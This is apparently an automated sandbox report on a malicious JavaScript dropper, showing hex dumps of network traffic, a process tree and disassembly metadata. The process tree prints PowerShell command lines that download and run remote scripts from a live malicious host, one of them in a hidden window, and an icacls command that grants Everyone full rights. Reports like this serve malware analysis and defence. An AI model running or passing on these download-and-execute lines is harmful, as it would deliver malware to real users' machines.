                                                  2024-12-31 17:00:00 UTC374INData Raw: 50 4b 03 04 14 00 00 00 08 00 2f b4 99 59 62 55 d7 71 0f 0c be 00 10 d8 c0 00 0e 00 00 00 76 69 73 69 6f 6e 41 70 70 73 2e 65 78 65 ec f7 53 98 65 dd d6 a8 0b ce b0 6d 5b 99 19 46 86 1d 91 e1 0c cc b0 6d db 66 86 6d 64 d8 b6 6d db b6 31 c3 a8 6f ad b5 ff aa 7d f6 bf 77 d5 f3 d4 d5 b9 38 ed 62 f4 3e 5a 7b 47 43 1f ad f7 31 a7 ac 86 3c 00 1c 00 00 40 02 50 00 5f 5f 00 40 0b e0 3f 22 08 c0 07 fc ff 14 30 00 a0 0d 15 80 4c d2 00 37 49 d6 02 26 33 49 16 1b 0b 34 33 77 24 b5 73 b0 35 75 d0 b7 26 b5 76 76 74 22 35 30 26 75 70 b6 21 75 b6 31 32 76 20 55 35 b7 61 65 41 82 a7 fc 09 f8 bf 89 c8 8b 01 00 32 60 e8 00 8f 5a 2b d3 ff d2 ed 00 c0 c1 10 c0 c0 f1 00 4b ec 00 00 29 d5 bf 75 6a 35 22 60 00 d4 7f 26 37 ec ff 5e 9d 7f cf ff 59 38 e8 7f 5b ff 3f 23 a0 66 0b ec
                                                  Data Ascii: PK/YbUqvisionApps.exeSem[Fmfmdm1o}w8b>Z{GC1<@P__@?"0L7I&3I43w$s5u&vvt"50&up!u12v U5aeA2`Z+K)uj5"`&7^Y8[?#f
                                                  2024-12-31 17:00:00 UTC1369INData Raw: e3 bf ca 06 1c 38 fd 73 61 e2 fc 8f 41 06 13 f0 bf 48 cf 7f f9 b3 e3 fa d7 9a 72 fe 27 b7 ff 85 13 fc 9f b8 2b bd ff d4 fa ef b6 55 fc 3f 73 ff 0e ae c7 f5 ef 77 07 b0 fa 6f 9c 20 83 93 d5 bf 11 e0 bf 2e ff 0e fe 8f d8 fc 9f f3 d3 fe d7 9d df ff f0 67 f3 df fd fd 17 87 6b 0e 09 00 c4 fe c3 d9 fc 03 da fd 37 4e f8 bf 38 c0 16 d1 3f 1a fe 7f 6a 46 06 00 b6 b0 ff 9b 3f 06 63 23 7d 27 fd 7f f5 cb 7f 7a e8 df 71 a3 a9 fe 3b 67 fe 3f 71 37 9a ff da e0 ff c4 ff 6f 5c cf 7f d5 fb 9f a6 d4 fa 8f bf 44 aa ff 56 2f 83 83 a3 83 e1 bf 66 8a ff e9 d5 7f 8f c9 ff 9b b8 4e 66 c6 d6 ff c4 06 08 1e ff 53 a7 d6 7f 0c 27 ff 57 ee 9f 57 b5 c3 60 60 6b fb af 16 00 dc a4 03 00 ff da 5b 37 e9 ff 3b 4e 8f c1 c1 d8 ca d6 f0 5f 31 ff a7 bd b0 d2 03 f8 5f 44 10 f0 ff c8 ff 5f a2 41
                                                  Data Ascii: 8saAHr'+U?swo .gk7N8?jF?c#}'zq;g?q7o\DV/fNfS'WW``k[7;N_1_D_A
                                                  2024-12-31 17:00:00 UTC1369INData Raw: 7f 3f 5d c3 54 fb 39 ae 9d 04 66 17 c8 24 b9 26 f0 c0 5d 46 74 c8 54 ba eb 03 d8 64 c9 9d 5d c5 e6 46 d9 d2 78 17 a4 f1 d7 02 5b fa ba 2e a4 74 c8 7d 59 f9 76 3b a8 af 97 0b 87 c1 f9 30 13 29 62 b9 a6 c0 dc 1c ec 85 fb ba 1f 13 d1 71 bc ae b3 73 79 05 5b 08 89 e3 71 ab 27 4a 3a c7 48 f0 05 7e 76 87 17 8c fa f5 12 35 b7 22 b8 c8 fd 5c 0b 3b 7b 89 07 fe a1 27 f2 78 71 a9 ec b7 b0 81 b6 9d aa a7 b5 ea b1 30 a9 f7 cb f7 be 42 e8 91 6e e3 2d 7d d0 1d 18 01 ac bc 1a 2b 5f b8 39 17 f8 fb 61 f9 85 33 27 5b b0 b7 9b ed 76 66 1c c6 52 b7 0a 6b ec b2 5a 13 75 a0 1e 3e e4 88 d4 20 45 94 13 f3 6d e3 6c cd da 07 ed cc 18 96 66 5b 71 66 5b 54 b9 68 10 9d ed 7a 22 53 bb eb 07 c6 5f 78 94 d4 43 74 76 57 a2 67 de f5 03 46 e5 4d ce dd 39 17 57 3d 8c af 3f 29 6c 2d 64 be 73
                                                  Data Ascii: ?]T9f$&]FtTd]Fx[.t}Yv;0)bqsy[q'J:H~v5"\;{'xq0Bn-}+_9a3'[vfRkZu> Emlf[qf[Thz"S_xCtvWgFM9W=?)l-ds
                                                  2024-12-31 17:00:00 UTC1369INData Raw: 78 a0 83 da e5 c6 7f a6 7c f0 73 2c 7b 41 19 32 a7 97 95 7e f2 0e a4 e6 cc ee b7 b8 43 b9 44 6c f7 9b ff d3 f1 cc c4 3d 29 cf 03 a7 61 42 27 c1 09 d2 e8 85 a4 55 1a db fe b4 40 8b 16 41 b3 71 62 41 1b 12 73 74 c7 c4 38 be cc 21 67 c1 80 8f d6 84 33 dd 18 c2 42 3d 68 49 9f 4f 2e 84 24 9e 49 64 25 d8 67 e5 c7 f6 a0 7c 36 14 ac 98 e7 5b 3b 60 55 7e dd ca 9e f5 82 a9 b3 b0 70 cc 44 b8 07 3a 3a 2e e8 4e e0 3c 35 72 09 cc 1d bd d9 88 42 92 99 68 51 bd 67 f6 ea d6 f4 b9 1b fc a9 64 06 6c 44 96 9f bb e0 b6 60 bb ac 3a c9 4f 74 22 2c c0 02 77 13 18 cc b5 2b 6a c5 9f b8 d0 ec 63 83 0f bf d7 50 18 ff e4 3b e4 f3 9e f7 a0 f7 e9 87 f2 0d bc 78 b4 21 42 39 e6 16 f2 8a f6 04 4a 2a 9a 27 64 6a 65 c9 77 25 13 b6 9e f2 9e 2d e0 73 41 ca 17 78 71 95 94 34 a0 cb db 33 da a5
                                                  Data Ascii: x|s,{A2~CDl=)aB'U@AqbAst8!g3B=hIO.$Id%g|6[;`U~pD::.N<5rBhQgdlD`:Ot",w+jcP;x!B9J*'djew%-sAxq43
                                                  2024-12-31 17:00:00 UTC1369INData Raw: 8a 42 52 81 21 f5 59 cb a2 9d a8 6d b9 1a b6 ed cd c1 0a c0 d6 fc 1c 81 c2 49 a8 dd 3f ac 00 02 63 12 cf 9e b3 c5 cb b8 9d f4 67 71 5f 1c 48 73 9b 64 6d 82 f3 9a d3 2c 50 16 2f e2 1a bf dd d1 9d e6 e0 7e a6 fb f6 7c d3 39 91 2b cd 44 2a 90 24 56 a9 49 9b 64 74 54 ab 67 69 e2 9e 5d bc a3 55 9c 50 d0 ec c6 c4 04 31 35 62 f1 6c 8e b1 55 8b 3d 1b f0 6c 7c b0 25 5d 85 fa 59 79 8b 99 a6 ac e6 bf 6f f2 3c f6 7c e8 8f f6 fa 4e d4 fa 67 96 e9 7c 8d ac 55 80 78 ec 54 22 82 5b 04 94 69 36 75 3a 54 db 3b 62 f3 72 32 3b 94 19 f5 5e c6 88 6b e9 2a 64 00 03 5e 76 20 56 3c eb 62 76 e4 24 20 c2 4d b1 c8 ff 93 9c b9 f5 e6 6b 82 12 81 19 14 09 ff 39 a3 4d 29 c8 83 9d d5 78 7a 5c a8 54 73 96 cc e4 1e b6 f6 d8 1c 31 46 92 f5 38 61 4d 06 99 fe 52 7c 1f 4d 62 bb 7f 27 59 bd 82
                                                  Data Ascii: BR!YmI?cgq_Hsdm,P/~|9+D*$VIdtTgi]UP15blU=l|%]Yyo<|Ng|UxT"[i6u:T;br2;^k*d^v V<bv$ Mk9M)xz\Ts1F8aMR|Mb'Y
                                                  2024-12-31 17:00:00 UTC1369INData Raw: 16 7f b4 09 b7 32 09 8e a6 f6 91 3c 76 d1 75 6a 0a 3d 94 33 3e 63 d1 9d ef c8 9f e6 45 99 ea 93 25 1b f8 06 a7 fe e8 ee e2 b4 08 eb 64 ec bb 0d 26 26 7f 45 eb b8 4a 47 f0 8a 2b 43 7b ef f5 e4 f7 81 64 0d 08 51 26 e4 5c 59 09 fc 1e 96 62 f8 59 bd 01 cb 7f ba d0 38 e0 d4 21 96 eb ee e1 f5 93 15 d9 0a dc 63 95 f6 98 4e 4c 91 5f a2 ce 38 7d d0 f8 57 3a f3 ec 38 ac ca 59 24 8a 51 8e 1a cf 2e 7d cb ef 8c c6 dd f8 3b d6 b1 2f fe 97 c0 03 55 9b 31 2a f6 7e cf ef 76 e3 1e 62 7d 3b 22 75 e8 97 b7 88 78 99 e2 4d 1d 3d 47 17 71 b1 98 26 32 32 2d 95 5e 0b 58 24 b8 f5 a1 a7 ad 33 b8 34 1b 88 3a 7c af 30 1a d8 82 a7 c7 58 6c ee 3c e2 d9 2b c8 a1 4e 40 87 3c e3 55 b9 c4 03 98 2d 6c a7 91 e3 52 36 30 6e ec cd 20 34 e8 c8 56 1b 66 f4 d5 52 34 a7 cf 00 d6 a4 06 62 0e 27 2a
                                                  Data Ascii: 2<vuj=3>cE%d&&EJG+C{dQ&\YbY8!cNL_8}W:8Y$Q.};/U1*~vb};"uxM=Gq&22-^X$34:|0Xl<+N@<U-lR60n 4VfR4b'*
                                                  2024-12-31 17:00:00 UTC1369INData Raw: c2 df 3e 6f 10 b8 68 71 6c e2 3a c0 96 fa 3b 83 9b 14 19 ed 0e 50 8b b3 5b 9b 5f 2f 59 5c 45 23 bd fc 64 b9 1b 3b 4d 0c 61 ce 84 23 53 e3 0a 9a 46 e2 b2 ea 53 ad 2a 86 b0 30 da d3 f7 74 31 9e 85 a7 6b de 73 f9 79 dd 5d fd b2 7b f2 4e 3c ec 56 f2 58 59 e9 ae 8f 40 be 8b d4 34 e5 ee b3 ee a0 36 5e 51 7f 54 57 3b 4b f6 99 d0 96 85 b4 7d b1 26 23 07 bf c1 e0 73 e9 b5 82 7b e0 65 da f9 52 85 1a 57 da 1e 64 7e 9e cb 1c 5d e4 3a 6b 1c ee ca ea 2c e9 d6 6e 3c 4e f4 41 c7 c6 fe 9c db 61 89 b8 d1 8b de f0 f2 40 80 03 3d b1 fb 72 a3 44 83 18 1d be 1f 4e 14 11 df 56 33 f5 d7 68 ee a8 22 3d 08 47 8b a6 70 94 de 30 d0 23 5d c6 29 c0 15 ec 96 4c fb 9d 98 4d 1a f3 bb 69 bb 25 ab fb b0 ac 4b af 8a 3a a8 ed 08 33 9c 47 0b fb 56 56 e3 3b 77 a5 c5 e2 95 df b6 70 1a d8 bb 6e
                                                  Data Ascii: >ohql:;P[_/Y\E#d;Ma#SFS*0t1ksy]{N<VXY@46^QTW;K}&#s{eRWd~]:k,n<NAa@=rDNV3h"=Gp0#])LMi%K:3GVV;wpn
                                                  2024-12-31 17:00:00 UTC1369INData Raw: 5d e6 97 02 a6 8f c7 80 b9 e6 8c 59 69 dd 01 24 1b c9 cb f3 82 cd a3 9d a7 c2 55 0b ab d9 c1 af 74 95 75 c9 45 3b 3b c6 d1 a9 0e dc f1 c2 ca 9f 2d 1d 95 c3 68 ba 50 a2 fd 55 92 99 7b 63 72 55 d8 53 cb 15 03 84 31 c8 b0 e8 c8 9e d8 3d bb f1 ce 62 91 ba 9d 92 db bc 93 8e b5 48 42 e2 e3 40 10 27 5b c5 b1 be 7a b3 fc 06 13 b7 c4 6e 8d 82 bf 01 4a f7 db a8 63 8d bd 10 a4 07 ad 49 8d 35 76 0b de 95 b1 78 b2 66 78 ce 14 61 fc dc db 1e 92 99 51 69 ff 82 25 03 0e f5 bb 95 18 ad a1 cd 3d b6 29 27 69 d3 e5 f6 da ae a4 ff e1 3f df 2c 56 13 b7 36 21 dc d5 f5 c2 bc af ad de 9e 4a af c0 d1 a0 1b 36 ed 1c ae 33 21 06 82 b3 6f d3 7f 24 97 ac bd de 52 a1 76 47 14 25 24 66 89 c0 f7 56 65 b7 90 72 56 57 3e 33 ed 61 0b 5b be db c8 43 a8 e1 fa a6 6e 43 27 68 bf 7c d4 47 a8 ee
                                                  Data Ascii: ]Yi$UtuE;;-hPU{crUS1=bHB@'[znJcI5vxfxaQi%=)'i?,V6!J63!o$RvG%$fVerVW>3a[CnC'h|G
                                                  2024-12-31 17:00:00 UTC1369INData Raw: 58 16 7e 96 53 4a fe f4 08 b2 43 ca b2 56 f5 ee 69 c2 16 65 19 30 64 e2 1e d5 73 7d f2 ea e6 c8 43 cc c6 b2 a5 71 21 4e 83 d7 a1 4c 3e db f9 0d bc 7b 86 45 62 5e e7 8d a2 ac ff e9 41 53 af 60 b0 2f 24 1c bc 10 40 f3 59 6b 7a ba 35 ec a0 1f 05 8b 4f ab 8a 05 67 be 89 90 48 07 ba fa a4 56 85 52 34 41 9a 26 ff 15 36 67 f4 f5 be e1 73 74 32 02 ed 18 3d e5 b7 6f b4 39 f6 92 04 ad f8 57 76 c6 dd 38 78 28 d8 a6 eb b0 90 e1 d7 28 15 bf 8f 35 a1 9f b0 f8 6f c4 00 b8 84 71 f9 85 8a d7 5f 70 f6 d7 b6 66 c6 06 6e 8a 86 d9 ec c2 ee 1a c3 f1 b0 f6 75 ca 75 48 12 18 e8 8a ef b8 39 76 84 d3 0b 56 5f 6c db fa 5e 0b b9 ee 4e a7 4f ea 98 e3 f2 df c9 4b 8d fc 2b 14 d8 03 c8 3e 3c 78 d2 fa 47 18 ea ee 09 42 07 f1 80 9b 3a ec 59 74 29 15 d1 42 6c 1e a9 07 5d 8d cb 46 ae 30 ab
                                                  Data Ascii: X~SJCVie0ds}Cq!NL>{Eb^AS`/$@Ykz5OgHVR4A&6gst2=o9Wv8x((5oq_pfnuuH9vV_l^NOK+><xGB:Yt)Bl]F0
                                                  2024-12-31 17:00:00 UTC1369INData Raw: 18 26 14 cf cb 12 d9 a9 d9 fb 4b 1e 21 2d cc 59 54 ac 4a 0c 69 10 e8 4c d7 2a b7 42 64 9a bd 1d 2a 66 3a a6 39 4a d5 f7 3d 5a f1 34 8f 0f dd fd 87 3b 55 c1 9d 0f 01 5e ae 25 5e 0f 9d af a8 0d 29 cb 85 8d f4 6f 45 73 1f ff 1f b1 99 0e 6d a9 27 31 64 ac 7b da af 8b fd 5e 48 ce 8d e6 d7 bf 2d 8a 70 0a a4 cf ef 20 ee dc 1e 92 76 b7 6f 63 f8 33 7e 7a ba 6e 08 2d 51 1a bc 31 c3 9b 38 bd 78 91 32 b8 77 8f 91 59 0f f4 a0 42 85 58 fc b6 5e 40 3e 75 5b c7 66 30 3b a4 67 8c da e8 28 a2 5e 0c 2d 76 76 d3 22 5b e9 5e c9 94 1f e3 13 42 1a 94 b9 8f d0 73 fa 00 f4 22 db cb 08 be 10 ce dc f0 bb 01 d7 bf 8a f8 32 14 4d 70 f7 3f f1 53 0d 1f 5d 6f 02 db 94 00 9d c8 2f 07 95 e4 b3 3f 5e 7d 7b 3c d2 8c 3f 82 86 b2 d3 f6 f8 6d 90 9c 70 43 e0 5e 1e 6c 6a 4a d6 24 e3 65 e7 d4 c2
                                                  Data Ascii: &K!-YTJiL*Bd*f:9J=Z4;U^%^)oEsm'1d{^H-p voc3~zn-Q18x2wYBX^@>u[f0;g(^-vv"[^Bs"2Mp?S]o/?^}{<?mpC^ljJ$e


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.11.2049716104.21.75.1264436420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-31 17:00:08 UTC200OUTPOST /fsp/contador/ HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                  Content-Type: application/json
                                                  Host: saffplano.com
                                                  Content-Length: 57
                                                  2024-12-31 17:00:08 UTC57OUTData Raw: 7b 0d 0a 20 20 20 20 22 6e 6f 6d 65 5f 70 63 22 3a 20 20 22 57 31 30 36 34 5f 30 33 22 2c 0d 0a 20 20 20 20 22 69 64 69 6f 6d 61 22 3a 20 20 22 65 6e 2d 55 53 22 0d 0a 7d
                                                  Data Ascii: { "nome_pc": "computer", "idioma": "en-US"}
                                                  2024-12-31 17:00:09 UTC971INHTTP/1.1 200 OK
                                                  Date: Tue, 31 Dec 2024 17:00:09 GMT
                                                  Content-Type: application/json
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  vary: Accept-Encoding
                                                  x-frame-options: SAMEORIGIN
                                                  x-content-type-options: nosniff
                                                  x-xss-protection: 1; mode=block
                                                  x-permitted-cross-domain-policies: master-only
                                                  referrer-policy: same-origin
                                                  alt-svc: h3=":443"; ma=86400
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2P0zjMtj4Xqp%2FGGCoF9hqCZf%2FydhByrjvhlkdlzytP9T7EXXCTdhengReMNJCmdUZ1ENQ5S8Npxr6jUAHRO3UH9unwMqmoiyr3JdpMvUl2Oh0QAoI2k04PqpLBd4jXAG"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8fabd2fbfdc8d9e9-MIA
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=129146&min_rtt=128970&rtt_var=27506&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=917&delivery_rate=29532&cwnd=250&unsent_bytes=0&cid=8f95d87fda29dd6d&ts=943&x=0"
                                                  2024-12-31 17:00:09 UTC137INData Raw: 38 33 0d 0a 61 72 72 61 79 28 32 29 20 7b 0a 20 20 5b 22 6e 6f 6d 65 5f 70 63 22 5d 3d 3e 0a 20 20 73 74 72 69 6e 67 28 38 29 20 22 57 31 30 36 34 5f 30 33 22 0a 20 20 5b 22 69 64 69 6f 6d 61 22 5d 3d 3e 0a 20 20 73 74 72 69 6e 67 28 35 29 20 22 65 6e 2d 55 53 22 0a 7d 0a 7b 22 73 75 63 63 65 73 73 22 3a 22 41 63 65 73 73 6f 20 72 65 67 69 73 74 72 61 64 6f 20 63 6f 6d 20 73 75 63 65 73 73 6f 2e 22 7d 0d 0a
                                                  Data Ascii: 83array(2) { ["nome_pc"]=> string(8) "computer" ["idioma"]=> string(5) "en-US"}{"success":"Acesso registrado com sucesso."}
                                                  2024-12-31 17:00:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:11:59:43
                                                  Start date:31/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js"
                                                  Imagebase:0x7ff6b4190000
                                                  File size:170'496 bytes
                                                  MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:1
                                                  Start time:11:59:44
                                                  Start date:31/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content "
                                                  Imagebase:0x7ff642fe0000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:11:59:44
                                                  Start date:31/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff60dd00000
                                                  File size:875'008 bytes
                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:11:59:54
                                                  Start date:31/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "iex (iwr https://saffplano.com/download/uploads/KciVS6w55td9u.txt -UseBasicParsing).Content"
                                                  Imagebase:0x7ff642fe0000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:11:59:54
                                                  Start date:31/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff60dd00000
                                                  File size:875'008 bytes
                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:8
                                                  Start time:11:59:57
                                                  Start date:31/12/2024
                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  Imagebase:0x7ff64f050000
                                                  File size:496'640 bytes
                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:11:59:58
                                                  Start date:31/12/2024
                                                  Path:C:\Windows\System32\icacls.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\system32\icacls.exe" C:\Users\user\AppData\Roaming\App_86026 "/grant Everyone:F" /T /C
                                                  Imagebase:0x7ff791a60000
                                                  File size:39'424 bytes
                                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:12:00:06
                                                  Start date:31/12/2024
                                                  Path:C:\Users\user\AppData\Roaming\App_86026\visionApps.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\App_86026\visionApps.exe"
                                                  Imagebase:0xb60000
                                                  File size:12'638'224 bytes
                                                  MD5 hash:A9BCDEE7DAD18ADC545C4003B77A2D62
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 65%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:13
                                                  Start time:12:00:15
                                                  Start date:31/12/2024
                                                  Path:C:\Users\user\AppData\Roaming\App_86026\visionApps.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\App_86026\visionApps.exe"
                                                  Imagebase:0xb60000
                                                  File size:12'638'224 bytes
                                                  MD5 hash:A9BCDEE7DAD18ADC545C4003B77A2D62
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Executed Functions

                                                    Function 00007FFB547C82B8 Relevance: 1.9, Strings: 1, Instructions: 611COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1913687375.00007FFB547B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB547B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffb547b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: kN_L
                                                    • API String ID: 0-4113449972
                                                    • Opcode ID: 864fbeea61c29038d0faf0368d9bf4bb58b92a37f79ac2f957aed7d227915813
                                                    • Instruction ID: 88fabb6c2a895f84e8abcc9f087f023be014f6f8b2289575b1e95f5e2f469cae
                                                    • Opcode Fuzzy Hash: 864fbeea61c29038d0faf0368d9bf4bb58b92a37f79ac2f957aed7d227915813
                                                    • Instruction Fuzzy Hash: BC220A7460894DCFDB98EF2CC898AA977E1FF68305F0501A9E85ED72A5DA35EC41CB40
                                                    Function 00007FFB54885F25 Relevance: .4, Instructions: 427COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1914431003.00007FFB54880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB54880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffb54880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7ab2cebb89dfc0e9716897787e421e75df5c807e0ad30428aa1f934c3129445
                                                    • Instruction ID: 3817785b76212f1aeebec976523178086487be30ad584f8328459f9fa61ffd69
                                                    • Opcode Fuzzy Hash: a7ab2cebb89dfc0e9716897787e421e75df5c807e0ad30428aa1f934c3129445
                                                    • Instruction Fuzzy Hash: A3D148A2A1DB8A8FE795AB7884A56B57FE1EF45310B0C05FED04CDB097DA1CAC09C345
                                                    Function 00007FFB547C81B3 Relevance: .2, Instructions: 212COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1913687375.00007FFB547B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB547B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffb547b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2425a6db2c12691d21dd7ce0a364d9c57957eed621e6200779671f8166c3c78e
                                                    • Instruction ID: 34fe6b4f105d5f737e9a53d8e305620f117d221d0f40f7b4adef84625d0ba6b8
                                                    • Opcode Fuzzy Hash: 2425a6db2c12691d21dd7ce0a364d9c57957eed621e6200779671f8166c3c78e
                                                    • Instruction Fuzzy Hash: 2451C871A1D918CFDB59EB38D8D96BA77E1EF85300F0401BAE44DD719BDD28AC428781
                                                    Function 00007FFB547BDD45 Relevance: .1, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1913687375.00007FFB547B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB547B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffb547b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d623a4701480be031a3728f4b4de0eadfe8070461db75ef55da6a036bb7db32e
                                                    • Instruction ID: b97f70e0cfdc36bf7aa55e7224ee75bf3677283ca725df78b745bb57f3cb2612
                                                    • Opcode Fuzzy Hash: d623a4701480be031a3728f4b4de0eadfe8070461db75ef55da6a036bb7db32e
                                                    • Instruction Fuzzy Hash: D431167191CB488FDB18DB5CDC4A6E97BE0FB99320F04426FE449C3252DB74A8558BC2
                                                    Function 00007FFB5469EE20 Relevance: .1, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1913163256.00007FFB5469D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5469D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffb5469d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c8b65e0f2bc3b4371507afe77a6b32d032fea299cba5e9f0514dc4331bdb3a9
                                                    • Instruction ID: 9cd43d1cee5afadcab3b589406bb9ffbfad20cb8a89a46973bcd0ff40050d5e7
                                                    • Opcode Fuzzy Hash: 1c8b65e0f2bc3b4371507afe77a6b32d032fea299cba5e9f0514dc4331bdb3a9
                                                    • Instruction Fuzzy Hash: 7D41D27140DBC48FD7569B38DC95A523FF0EF56220B1905DFD088CB1A7D629E849CBA2
                                                    Function 00007FFB547BBB2A Relevance: .1, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1913687375.00007FFB547B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB547B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffb547b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fabeda392455faefabbd0994960cc9e678fcc96a25229e4ec9930fc41472779d
                                                    • Instruction ID: 1cd3e9e7f1ce14df629a1ca210733eb9bba8455ba9a0e338921abdcf2321ec5c
                                                    • Opcode Fuzzy Hash: fabeda392455faefabbd0994960cc9e678fcc96a25229e4ec9930fc41472779d
                                                    • Instruction Fuzzy Hash: F131E4B280C6828FD3069B2CD8FA4E57B60FF1121970C41BAC4894B457EA1E691BCB82
                                                    Function 00007FFB547BEA6C Relevance: .1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
